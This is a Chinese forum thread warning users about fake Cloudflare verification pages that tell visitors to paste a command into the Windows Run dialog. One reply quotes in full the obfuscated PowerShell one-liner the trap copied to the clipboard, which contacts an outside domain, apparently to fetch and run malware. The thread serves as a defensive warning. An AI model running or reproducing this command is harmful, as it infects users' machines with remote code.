小心伪装 cloudflare 验证木马病毒陷阱
好像这几天就看到 V2er 有中招的,我今天访问 binchekc/IO 这个网站的时候,第一次出现 IP 被禁止访问,好嘛很正常有些网站是会屏蔽中国 IP ,然后切到科学 IP 访问出现一个伪装成 cloudflare 验证的界面
当时就有点脑子愣住,为啥要 win+R ,还没反应过来这是 run 窗口,然后也按下了 ctrl+V,突然反应过来不对,迅速关闭窗口,命令并没有执行
具体命令我就不帖了,免得有人意外中招
我干过,是一个查卡 bin 的网站。。害。 我中的可以参考这个: https://zelenka.guru/threads/10062663/
因为装了 ditto ,当时复制的内容还有: powershell.exe -wIND miniMize \(VHv='ExportedCommands';\)AbM=IPMO ’M.P.U*’ -Pass;\(AbM=\)AbM.\(VHv.Values.Name;\)Lmp=\(AbM[52];\)psA=\(AbM[51];.\)psA(.\(Lmp nucleotidally.com);\)UMfUnikKYAscuONIMqeIzgmmnJeTSBRNxjawkdlLDxjBjeTztLGJTyfamMjinfrrjJLLmIockpBOnpRYAOVQZQuoQbMkBBayYMARietEUAodAHbGrliFyLrxITbBAUzhuCeNovchmXHPYvRxVBudWJXZLfIuPPJNgbgnVrnsarsHWyNiMWDulJjJSqYSjjaYpKsaduZehjtuCGnwXVqidZgrDawNqqIwPXgalGhQBQqdPGfhoobjsKTqjxTNjqhhxvPGqQEcPDiRjmlLnvYosZHONZNRAwCTTJzlWkqsjLjzInBfjCcTUbHQzTOMbCNszlTyqdIAaMooRdOcTvqfoHoETNoFFJHsAQSgIgrfwzLMBfQnJnXrXjuQuznOruVJtlVAQLvMOaEJYZbFPaMpshhEWcURszSHtyEiCLCPGWEXTfMOfxaeFl
说句丢人的话,我也中过。。。有时候不是不知道套路,就是纯粹脑子短路+手比脑子快 我还干过双击 exe 的事。。。鼠标按之前脑子就觉得不对,但是手指还是双击了。。